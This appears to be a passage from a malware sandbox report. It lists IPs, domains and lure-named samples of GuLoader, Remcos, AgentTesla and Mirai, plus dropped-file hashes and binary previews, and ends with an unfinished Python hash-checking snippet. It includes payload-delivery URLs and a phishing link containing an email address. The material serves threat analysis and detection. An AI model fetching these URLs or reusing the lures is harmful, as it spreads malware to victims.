94.156.6.253 | 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe | malicious | GuLoader, Remcos |
94.156.6.253 | booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exe | malicious | GuLoader, Remcos |
94.156.6.253 | SirtakiQuote No 104-346.exe | malicious | GuLoader, Remcos |
94.156.6.253 | 2023.10.11.59363PR69186_1.exe | malicious | GuLoader, Remcos |
94.156.6.253 | CMR CA4653XT -10-10-2023-7.exe | malicious | GuLoader, Remcos |
94.156.6.253 | SirtakiQuote_No_104-346.exe | malicious | GuLoader, Remcos |
94.156.6.253 | vxJjLEvhQU.exe | malicious | GuLoader, Remcos |
94.156.6.253 | Or_amento_ARSENAL_260921_5_4808.exe | malicious | GuLoader, Remcos |
94.156.6.253 | #U041a#U043e#U043d#U0442#U0440#U0430#U043a#U0442_#U2116_OX-SOC_150923_FOB.exe | malicious | GuLoader, Remcos |
217.147.225.69 | DHRI_kurumsal kimlik rehberi-2023.exe | malicious | GuLoader, Remcos | gudanidevelopment.ge/IogvoayYhe139.bin
217.147.225.69 | DHRI_kurumsal_kimlik_rehberi-2023.exe | malicious | GuLoader, Remcos | gudanidevelopment.ge/IogvoayYhe139.bin
217.147.225.69 | #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | malicious | GuLoader, Remcos | gudanidevelopment.ge/IogvoayYhe139.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gudanidevelopment.ge | z27Icycold_Orcamento-HPN-100001329016-1.exe | malicious | GuLoader | 217.147.225.69
gudanidevelopment.ge | DHRI_kurumsal kimlik rehberi-2023.exe | malicious | GuLoader, Remcos | 217.147.225.69
gudanidevelopment.ge | DHRI_kurumsal_kimlik_rehberi-2023.exe | malicious | GuLoader, Remcos | 217.147.225.69
gudanidevelopment.ge | #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | malicious | GuLoader, Remcos | 217.147.225.69
geoplugin.net | Yegdeajzb.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INVOICE098789#U00b0098980.jar | malicious | Remcos | 178.237.33.50
geoplugin.net | new_purchase_order_catalog_design_no_TZ806_300102023_00000000023.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | DHRI_kurumsal kimlik rehberi-2023.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | SWFIT-MT-101-PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | Invoice 78284722.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | https://cdn.discordapp.com/attachments/1167017339733159957/1167039272587636767/Predracun_23-0100-002760.vbs?ex=654cad05&is=653a3805&hm=e19c0c737247a9dc2d84c150c245b6f8f3d8876e42476061f1bdb6600b87af38& | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | bRaA.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | bRa9.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | V4ybHAFrDb.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Orden_de_compra.exe | malicious | Remcos, RedLine | 178.237.33.50
geoplugin.net | BBVA_COZURENT_7152_FBO_TULUM..exe | malicious | Remcos | 178.237.33.50
geoplugin.net | EUR-32608-Swift.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | IMG-0253-WAA6647734849932885477638Onwloaevka.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHRI_kurumsal_kimlik_rehberi-2023.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | G-SRL-OFFERTA65756737884495739578582950023Synsmand.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | qoute_pdf.com.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | HVuACIbZyx.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | proforma_Invoice.exe | malicious | Remcos, DBatLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NET1-ASBG | PO-35720.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | 5Night-6Days.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | SKM_Swift_copy.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | JDS.vbs | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | MSS.vbs | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | HRE.vbs | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | DHRI_kurumsal kimlik rehberi-2023.exe | malicious | GuLoader, Remcos | 94.156.6.253
NET1-ASBG | Quote.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | USD_18,772.00.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | INVOICE_140562.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | PR_301023xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | PR_281023.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | 0xh0roxxnavebusyoo.arm.elf | malicious | Unknown | 93.123.85.29
NET1-ASBG | 0xh0roxxnavebusyoo.x86.elf | malicious | Unknown | 93.123.85.29
NET1-ASBG | 0xh0roxxnavebusyoo.arm7.elf | malicious | Mirai | 93.123.85.29
NET1-ASBG | RFQ_-_231067_.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | Payment_swift.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | Nel.Eorder2023.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
NET1-ASBG | Ashok_Dargar._CV.xlam.xlsx | malicious | AgentTesla, zgRAT | 94.156.161.167
                                                                                                                                                                              Advance_TT_Slip.xlam.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                              • 94.156.161.167
                                                                                                                                                                              GRENA-ASTbilisiGeorgiaGEDHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              DHRI_kurumsal_kimlik_rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              q5Mcd4t3WA.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.228
                                                                                                                                                                              Dd2pY6BQH8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.230
                                                                                                                                                                              AelWXKBPbQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.223
                                                                                                                                                                              DsYilbWfVw.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.255
                                                                                                                                                                              https://loialte.com.ge/zxoliktrd/uyretred/gredtred/gredtorik/trebooiu/erperwq/azxlkgrednti/xzkcreiei/?foi=oph.empfang@diehl.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 217.147.239.122
                                                                                                                                                                              rXm4QSWGDYGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.238
                                                                                                                                                                              4czqYWTUq8Get hashmaliciousMiraiBrowse
                                                                                                                                                                              • 217.147.234.225
                                                                                                                                                                              ATOM86-ASATOM86NLYegdeajzb.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              INVOICE098789#U00b0098980.jarGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              new_purchase_order_catalog_design_no_TZ806_300102023_00000000023.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              DHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              SWFIT-MT-101-PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Invoice 78284722.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              https://cdn.discordapp.com/attachments/1167017339733159957/1167039272587636767/Predracun_23-0100-002760.vbs?ex=654cad05&is=653a3805&hm=e19c0c737247a9dc2d84c150c245b6f8f3d8876e42476061f1bdb6600b87af38&Get hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              bRaA.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              bRa9.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              V4ybHAFrDb.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Orden_de_compra.exeGet hashmaliciousRemcos, RedLineBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              BBVA_COZURENT_7152_FBO_TULUM..exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              IMG-0253-WAA6647734849932885477638Onwloaevka.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              DHRI_kurumsal_kimlik_rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              G-SRL-OFFERTA65756737884495739578582950023Synsmand.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              dwA3Y86oKf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 85.222.236.232
                                                                                                                                                                              qoute_pdf.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              HVuACIbZyx.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              proforma_Invoice.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
No context

Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll
LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe | malicious | GuLoader, Remcos
LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe | malicious | GuLoader
SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe | malicious | GuLoader, Remcos
SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe | malicious | GuLoader
ZH-SA_5012023.exe | malicious | Remcos, GuLoader
ZH-SA_5012023.exe | malicious | GuLoader
SirtakiQuote No 104-346.exe | malicious | GuLoader, Remcos
2023.10.11.59363PR69186_1.exe | malicious | GuLoader, Remcos
2023.10.11.59363PR69186_1.exe | malicious | GuLoader
CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe | malicious | GuLoader, Remcos
CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe | malicious | GuLoader
SirtakiQuote_No_104-346.exe | malicious | GuLoader, Remcos
SirtakiQuote_No_104-346.exe | malicious | GuLoader
000299288171.exe | malicious | AgentTesla, GuLoader
000299288171.exe | malicious | GuLoader
BR1498-23.exe | malicious | GuLoader
BR1498-23.exe | malicious | GuLoader
vxJjLEvhQU.exe | malicious | GuLoader, Remcos
SYZMMfgqPs.exe | malicious | GuLoader
Process: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 415
Entropy (8bit): 4.2322544435588325
Encrypted: false
SSDEEP: 12:3ICXEu63zU+A7QMwvbylMlt0pzUnyjGNlXhAwBaD2D2FP:37+3Y+sZwzuMl0zUnWGRVBaQ2t
MD5: 546501451552A02861F72FAE50B11385
SHA1: C3D844EC952B303A4A5135DFAC1DFE18814F82BA
SHA-256: 458D8B7DE12C47531B7D900718ED1B9F7CC2E1EAE176426F20B78A2CF9680D9A
SHA-512: 30AB3B84D77453746891CE951453CC9DCD69F45DD31677FDE78558585BCEB1080A2036D73B182AA550225AA3FC2F079A1A4D5D9B251265D002B3F085A7933D14
Malicious: false
Reputation: low
Preview: transmigrations reboils fyraftener frakrslers.kattekongerne eunike granskninger attaintment luftfarters excellencerne violinistinde.wrestingly crimean miljteknikernes algerians enfranchise tndsatsers betvingelsen softbacks foldeknivens chokeren idlesse..epitelcellerne nomenclatures orangeade araminta flden..oner kommandantskaber logway forbundsdomstol uncamphorated,spurveungernes linjeformaternes jibbed dbefont,

Process: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type: data
Category: dropped
Size (bytes): 162874
Entropy (8bit): 4.961801254259543
Encrypted: false
SSDEEP: 3072:mmrKhiV0LDqEq1zkvtO+rXQ4nMZDiOcnHc52qxpZdD9C:mM+i+mEqmvyLZGOcn852qxz59C
MD5: 062BFD9BA32451E2B482D77B66EAC766
SHA1: E42F386D33555241ABDDECE5F2324C65473353BD
SHA-256: 3710D8A8A57AC5D5466A53C1F7436D63533D2108F68326CE0C62CAB46BF9E3D5
SHA-512: DC978B8FB916742AB6643FF72736440807BC19584ECA0B35C980686D244AF86161668F4B1DDB2AECA88BE9671F6841A601EF5DD2E3BFE85ADE052124F943ADB4
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
File Type: data
Category: dropped
Size (bytes): 147559
Entropy (8bit): 4.953602101754117
Encrypted: false
SSDEEP: 3072:tJZhddeQAshdd4nC/t53/YbrU04Qs5nr3BtyxKdNG00RpHV:NLdeQAsTg+t53/tgs5r3vyxKrn0RpHV
MD5: 876ACB5CD0900906333FA513F3BDD7BE
SHA1: 21EEC3103D6956A7FBCF04B683113E33FD52BD59
SHA-256: D971B0ECEBE0FFB8D68D1629971090B1CEBC32AF5E8799773B9E2967E62F007D
SHA-512: 2BA4B2F59DD028295C7414AF2ACF7335702E7034F1886BCB241F541986F6A65741492C02F07439B685455756EC339EF91790F256C9CC1E476C4DFE96CD2A1E2E
Malicious: false
Reputation: low
                                                                                                                                                                                                                    Preview:...M.?...............fG..........U..p...q......n...Q.......%..~"....,x...........s..r>..6..1...7xX.........l....R............c.......[....A..^..Gs......r..I.....'S..`..h.......!..F.+..v.8....M.........c...v....8....^.............6...........:[....o..,........-..?...KA.............^.J.ap.a.`..(.....'..,...4.b....M..RP.........b>%7.....N*..n..............JW......d.................]f...-..........?.s......n.....T.?.....`e.....2.........:..7..Z..P.I.........R.w............h.............q...............9..x..li6....T.\.........Z.............@r.I...Q......@.......E..........U*.w.-.Z./...x...V..........C..............k............@.....V.......P........b..*.........P....is..W.@.A..m..!......u19....u........................w..M...@....i.....`B........uS.y..................................?<..^:...=.....z......................./.....+....l.......}.$......>_..U..Nv.S.........J..g.....y.........'........D...................4.(..../.....8...{.......6.......M'........F.........:.....Z..r
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17290), with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):17290
                                                                                                                                                                                                                    Entropy (8bit):2.736541597235058
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:uiSjkPMRUVxS9Aai4M/ucA6cOVV3EEEKVzZ3+:uiSjkPMqVxSaaxM/ucbPVV3EEEKV9+
                                                                                                                                                                                                                    MD5:AD43830BF7F814BD6FBDEF19B4C84608
                                                                                                                                                                                                                    SHA1:6F0E3730FA471F83FB3128A9BF38B8ACE02EBB3F
                                                                                                                                                                                                                    SHA-256:50786B844D3F7A72DAAFB60A7D83E781D25A4DC0B0F4F6A273F53E62A15D5CD4
                                                                                                                                                                                                                    SHA-512:4DE6E4C9511BC2D64D81BD8C740B96A3FEDF5057CA7646CBDD2C37D5513FECCF17B50C4DB8DC964B558EB94F4AA00A2764473C956C914ECDA6D62FCCC37E07A4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview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
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):242651
                                                                                                                                                                                                                    Entropy (8bit):7.77287545121691
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:8l8/6UHhrCFzUueK3Vhy20sQpHKmHH1CtZqinaKnz:+8/6UBWFzUG3Vhy20DfInqI
                                                                                                                                                                                                                    MD5:97D502FBC357926BAB150FB4C3419FBF
                                                                                                                                                                                                                    SHA1:9C66F01C73C00466AC75DA9732962E64786FC378
                                                                                                                                                                                                                    SHA-256:9E28355960FF811E5DF66D58B84DD8FD306C48965F5F442B697EF7B210F1E1F8
                                                                                                                                                                                                                    SHA-512:94D5E0E80E0332CC3A639C4955AE0D308CA2E0B4F64199E1AACEB055D41115638D180B1265E39A4F7AC2E8DE458807DC5C1F2A40D26AC68BB9B9A1D48A384067
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.........vv.....A.III......................=....&.... .........M..................................b.$........vvvv...]]]].(((...'.....==.............^......^^...e.....-............CC....G.....................b....t.......qq.....==.....rr....^^.dd.**............)))..............................::............EEEE..^................/.....a.......rr.t................................]]]].W.}.....|....g........NN..............,..............DDDD.RR..4......zzzz..2..............\\\\................{.....,....mmm..V.-..tt.....................e...........................^...eee.b................................88.....###......#...................PP.........................zz......v.............eeeeeee..........{{..........ss....,....]]]]]]]]......AA.(..9..H.................;;;....''.....&..................-.K .....[.<.........%.b!.......7..f..m.......F1_. ...Bd..........)%._.....`.......X.....Y....f.....f.....Y.DR......._.........>.$........ ...........f......\.d..........S .f......1.f.
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):50600
                                                                                                                                                                                                                    Entropy (8bit):4.928454944845069
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:VG0W3WqrXx1XBA8W47bdtGq8HOcR7az7eCH3hZhDYtRxx4mCnmT+Ah8uJ:NW3WqDx13FfLB8ucR7AZhyRxxnTh8uJ
                                                                                                                                                                                                                    MD5:6B44A940B6D5BC5888335089FB43C18D
                                                                                                                                                                                                                    SHA1:2DB16E5D3002409A1F35ABA2B274A7E07C350F02
                                                                                                                                                                                                                    SHA-256:D8553C5A0BA313F7D8E912CC33271753A97C51944B981036F1913CDFA74B86BB
                                                                                                                                                                                                                    SHA-512:EDC27D2D95596494109EB99F6AE3C15CEDF9C703EF7F54B32E7F25762D6DDFE2D4AE512E8A118772029739A509D5A8E71930E0893703098DD38DC7080976F6A1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....o... g........rR...........K..........~...Bk...V.....j..}.b.]4.K.-U......j...Kl.H........Z.4..............a.................S..........)...........M.B...r.........p.....~i....._.....................y..............H......%............3...<..;..U.L.%.u.o..............s/...........................1.8d)S....8.....H7.J.....]...............f.........?...:............)f.=)...i....l..@...t.|m.........-.4......................-.Z.......m...................e...^.-.N..3&......h....ZO......... .W........l.b..@....I..*.....s..........E...q.....O=.....K....l$.......<........r.....A......X.p....'..U-9...G...................{.{2......).............'...x...D.....g..d.....'>........{........S......m.......~..V.....>.........F......M.~..........r....t.Z;......S........~..?............z....c.H....T......P.......*.z.........6...........d..3....[..R.'..<....b........aJ:........%.....G...., ...........60........A...........|.....v..?.......'.#......N..d.k8.$........b....F..-..,<1.*...........J
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):45893
                                                                                                                                                                                                                    Entropy (8bit):4.9484698837646315
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:7mr8+vx6PPzQqQzEtsYIR1RtijHbX25k9L3RzFdyN+6vIRrWr53Wi5D8:08ExEzRtsLR1KjHL2cIY6Esb5D8
                                                                                                                                                                                                                    MD5:078CE341B403D69423C8467FA4608E3A
                                                                                                                                                                                                                    SHA1:5AC88E50C2F01754374ECE6F1A14441D0A084093
                                                                                                                                                                                                                    SHA-256:EB2FA712A256ED11319F697EA9CC641ECD5D17E94E4AD54EEE2F5553B2C3206D
                                                                                                                                                                                                                    SHA-512:5DFE2408ADE83709E498CCF5EA2C73827E61CD05B7CD29A9E15929E38A42F841877D651AEA140A5DA2B46B565E77AF72EB5462C9CFC7A65B1CC2989263562FE3
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..P.i...."..........ko............^.......c...... ........B......-\..............................Z.1....o...................M..%........h.Ql.v........B...........;S........................#.b..........f................V........Q..[..........|,.....dN......h....vI ].....5.q..W................,)...........W...........=....z.h.....f.........Z....6#......:.....P....................I..N...............dP.[........=........3...d..................r{|......p..E7............q..............4..N.....................%.E.m................7.?b...........\.F...............L......A......,...L.|..........."x...4...Q..u............t............<.d.....=.g......`...U.......o.........I1....F.....~.....nM ...............`..;.xF../...... S.......7..+...&.........A.`....<.h_..l.........~....f.V.....p...6V...|.....q........... .J..........4..A......S^.......C....7....n...........v...F....Q...,I...........Z...z...............D...............3Q.*H.....W.......).fI........@..Mx..............S........
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):90099
                                                                                                                                                                                                                    Entropy (8bit):4.9373935361505366
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:5Cx+lNAStDXmdFn6Vp5VktTLNil6G+3TSUVbSFAxL+xlKM11F2:QAXACDXmnnQ/otilO3TDUlKN
                                                                                                                                                                                                                    MD5:A59A3B62999030A478A3E70FB1BB3653
                                                                                                                                                                                                                    SHA1:62F5A487DF4E548B8BC295D01F1F8C84045DF7B3
                                                                                                                                                                                                                    SHA-256:E9323702B14545A104AB7EB631446BB9AF5F60906C8AFC60294973F7A1217A15
                                                                                                                                                                                                                    SHA-512:3CA8B858756F738A10CBB07FB5F937108490D2F5DF8281035D1C2CFA7A22D5F7BE9D0BADB0896263965CD2FF3BC1B9A510177C48CF93C24313E567B1F075962D
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:...+...:.c.&....Bp..............H|.o-..... .&g............c..K.....0...A.w.....$...........^...v.............B...>..................!....M........h..$....t.*Oi.....1.....V....8.H..+k....*.......?..............'..#.............k...C......_..{..L..6....7..o......SsM.".-d.....f.S..V.....lb.............!........M}......n..................s.9..u[a...;!z.4..'.f..b..........$......H..#....../....L..f.e.......p......Eei..e...............R...m....M...........<.........Y.........0..D.....e..z..4...k......?........7...E........m.I........Y.7W.3m.s.........a....>.......00................y....m.........H.G..........{).).3j..9........E...R.mR]...+..qD..........................F/.......n.m.....u$T.........[.........................|..........4>..](.}...B....b|...%........................$......:....v....6...x..6.......hI........z...<...+.................k...4y.....$....F..q9..v....../.'.....c.wb..A..........jA.........T.......x........J.Ef4..k..uQi.....u.............G........}/.\........
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):86732
                                                                                                                                                                                                                    Entropy (8bit):4.942566590751062
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:9dSfgAh7aZucRPI48b75qv8+sSpnnFDD1pyOi1HLX6QA5pgBDTpisC/b:9dS17aZKzNqUBSpFFpyFosBcb
                                                                                                                                                                                                                    MD5:B8EE38B826075CAD17DFB452522B28D6
                                                                                                                                                                                                                    SHA1:F64D757BE5CF1CD789B13B7044D9E0319DC695AE
                                                                                                                                                                                                                    SHA-256:B4F411DA3B8BE4211C050538942AB991E7DCAFADACC8095BA47EF24A47F52D19
                                                                                                                                                                                                                    SHA-512:383B7BDE861F0273F0B5C258DBD252CEAE89436276BC0724319FC9C4D284514501383C6BE0D38440EBC9407A8F1B4A1A77D2E02AC7AAC2AA1DF6968CF343B95B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:i.......................(q...K...........`....5..-s..........j.....@.Z......b.................-...~..7...\....=.,...rN.m...o.`...........5x....I.....g........K..].....@......J..T..'.HX.(.........:'...qD..............D..g.!.Q.`..I....m.....c...W..W..B.Y.........=..&......................T..3...._.....................n..............S....(...........6......6................R..........~....8.......Dr.....&%B....P..2.............aS-...~............I............!..p:.....}:....y....Qq.....w.K.=..............N./....................O....)x....|...,.....&...H.......................".M.........n....>.H................*I.....L."...)..f..........R..K...!.............7.V.X...m.Z.:.P..........T.....W\..h...............0.. .&...l......f......................6............_.........v....2'.....i..f..'................O..............5.9.....)....0..?.............,.F..............G..1..J...E.m.d...F.2.'...........Z..W....(.......|Q+.........1....&........J~.......|.w.x.....................S....
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65697
                                                                                                                                                                                                                    Entropy (8bit):4.931395567400519
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:QH2elU0SE5tqdyzDKhH5/K77FT8hQWJcpj7hjOnGMgHTTWAo1v5sb3dSn4cAF4VI:7qrt0hcHFw6pjlJnzmsTdSNzC8DAR9
                                                                                                                                                                                                                    MD5:EDCBC056E7C101CE437DF45FE03B30B5
                                                                                                                                                                                                                    SHA1:2265E3B7E4BB1B14D43740F0F93C67EE0DDCA792
                                                                                                                                                                                                                    SHA-256:3915AD2806B97D2EC41A8E9EF8235339458E4821A26A532B77F228820BF3CF7E
                                                                                                                                                                                                                    SHA-512:08583F6BCA6564938CC02BD612FA201D1C0E9253B9D2F3F247C36A7DDF2CEA3A0BF37190657A5630ABD140169A7FEF3547765AEBAB253ABC5D73B1B8A17439AD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....+NXR.........Z..j...;...J.q.....aT.P............gA..*.J..s......:......Y...\......t.Q........a....?................................r....N.....!.B..:.o.....v.............4}..m..._Y.....\.....%...................c...3.........Er.......[.......B......y...,F............d........m.e..........P.*..........'..\.......B.q.i.j..........I.!........;...[.X..........X.u......].J.J..............Y.v.2....S. ......4...}.X...A.(....'...........:..P..........p.......<.. ......."...........~...p.............sT...........p.....#...............M.Q.W...m...........K./..B...s..... ......Go............|....Z........tJ.........U.I...K....r..+.......:.^.#A.2..............i.........v......9......M........].........q...........f.....4.<....6....E.....a,.....c.Z...............:..........8.....3..\@.......... .....&[.,......?.......{=..~Cm!..s....0..........y.........|Q.V............]............Qx....CZ.Z...T............z:..............6...........bWGd...!r.U...7.Q..q..$.}<{....Z.....%.............
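The size, entropy and hash fields listed for each dropped file can be recomputed offline, which is how a responder confirms that a file recovered from a host (possibly renamed) is the same artifact the sandbox saw. The Python below is an added example and is not code from the Joe Sandbox report: it derives the same fields (size, 8-bit Shannon entropy, MD5, SHA-1, SHA-256, SHA-512) from a byte string and checks the SHA-256 against the set copied from the dropped-file records above. The input bytes are constructed here, and the entropy threshold used to flag likely compressed or encrypted content is this example's own rule of thumb, not the criterion behind the report's "Encrypted" field.

```python
"""Recompute the per-file fields a sandbox dropped-file record reports and
match a file against known hashes. Added example; not code from the report."""
import hashlib
import math
from collections import Counter

# SHA-256 values copied from the dropped-file records on this page.
KNOWN_SHA256 = {
    "D971B0ECEBE0FFB8D68D1629971090B1CEBC32AF5E8799773B9E2967E62F007D",
    "50786B844D3F7A72DAAFB60A7D83E781D25A4DC0B0F4F6A273F53E62A15D5CD4",
    "9E28355960FF811E5DF66D58B84DD8FD306C48965F5F442B697EF7B210F1E1F8",
    "D8553C5A0BA313F7D8E912CC33271753A97C51944B981036F1913CDFA74B86BB",
    "EB2FA712A256ED11319F697EA9CC641ECD5D17E94E4AD54EEE2F5553B2C3206D",
    "E9323702B14545A104AB7EB631446BB9AF5F60906C8AFC60294973F7A1217A15",
    "B4F411DA3B8BE4211C050538942AB991E7DCAFADACC8095BA47EF24A47F52D19",
    "3915AD2806B97D2EC41A8E9EF8235339458E4821A26A532B77F228820BF3CF7E",
    "847D59B3FB55AEBA320DCEEACB7E10F980DBCB0F9141B44CF71D47BB910581CE",
}

# Assumed rule of thumb for this example only (not the sandbox's criterion):
# compressed or encrypted data approaches the 8 bits/byte maximum.
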